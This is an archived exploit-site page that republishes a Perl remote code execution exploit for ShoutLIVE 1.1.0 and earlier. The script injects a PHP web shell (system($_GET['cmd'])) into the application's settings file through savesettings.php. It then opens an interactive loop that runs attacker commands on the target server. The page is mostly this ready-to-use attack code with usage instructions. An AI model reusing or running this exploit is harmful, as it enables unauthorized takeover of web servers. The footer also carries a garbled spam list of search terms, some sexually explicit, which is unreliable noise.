about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , ShoutLIVE <= 1.1.0 (savesettings.php) Remote Code Execution Exploit



2006-03-18 ShoutLIVE <= 1.1.0 (savesettings.php) Remote Code Execution Exploit
Rated as : High Risk

#!/usr/bin/perl
##################################################
# ShoutLIVE <= 1.1.0 Remote Php Code Execution
# Based on: http://www.frsirt.com/bulletins/4109
# Credits: Coded by DarkFig
# Website: http://disarm.free.fr/bo_hard/
# Greetz: All AcidRoot/Bod members =)
##################################################
use IO::Socket;
use LWP::Simple;

if(!$ARGV[1]){headers();
print "\n| Usage: perl shoutlive110.pl <host> <path>   |
+---------------------------------------------+
| Coded by DarkFig |
+------------------+
";exit}

sub headers() {
print "\n
+----------------------------------------------+
| ShoutLIVE <= 1.1.0 Remote Php Code Execution |
+----------------------------------------------+";}

$host = $ARGV[0];
$path = $ARGV[1];
headers();
$ncon = "\n [-]Can't connect to $host...";
$ycon = "\n [+]Connected to $host...";
$sdat = "\n [~]Sending malicious request...";
$ycmd = "\n [+]System command writed...";
$req1 = "send_email=0\" ?> <? \$cmd = \$_GET\['cmd'];
system(\$cmd); ?> <? #";
$lgr1 = length $req1;
$psti = "$path"."savesettings.php";

my $sock = new IO::Socket::INET(PeerAddr => "$host", PeerPort
=> "80", Proto => "tcp") or die
"$ncon";
print "$ycon"."$sdat";
print $sock "POST $psti HTTP/1.1
Host: $host
Content-Type: application/x-www-form-urlencoded
Content-Length: $lgr1

$req1\n";
close($sock);
print "$ycmd";

while(1 ne 2){
print "\n [$host]\$ ";chomp($cmd = <STDIN>);
if($cmd eq "exit"){eofi();}
$req2 =
"http://"."$host"."$path"."settings.php"."?cmd="."$cmd";
$page = get($req2) or die "$ncon";
print $page;}

sub eofi() {
print "+----------------------------------------------+
|     Coded by DarkFig : [*BoD*]_AcidRoot      |
+----------------------------------------------+\n";exit;}
securitydot.net - 2006-03-18

Advertising

Copyright 2007, SecurityDot
Wed, 25 Nov 2009 22:30:53 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Www.smu bf www.poubin animal sex news for c www.qyx114 www.battel invision p woman and WWW.INDIAN WAPTRICK.C www.fuckth p...2Fid.t ms06-033 sex.flim www.lelepp Ines Cudna www.luck36 www.xvideo FrontPage/ Typo3 mtnonline. Sofia latj Animals. www.0563lt %252Finclu activation www.waptri kari www.lohome 2001.315rh vediosexy Gadis beli free vedeo 2001.315rh seabeesfan www.v2jw.c external.p www.mom+te Www.Fuckin www.teenan www.feiwei forumup www.lovede com_dtregi www.freexx 1-1-1-1-ww Saniamerza mani www.x.x. Sexo grati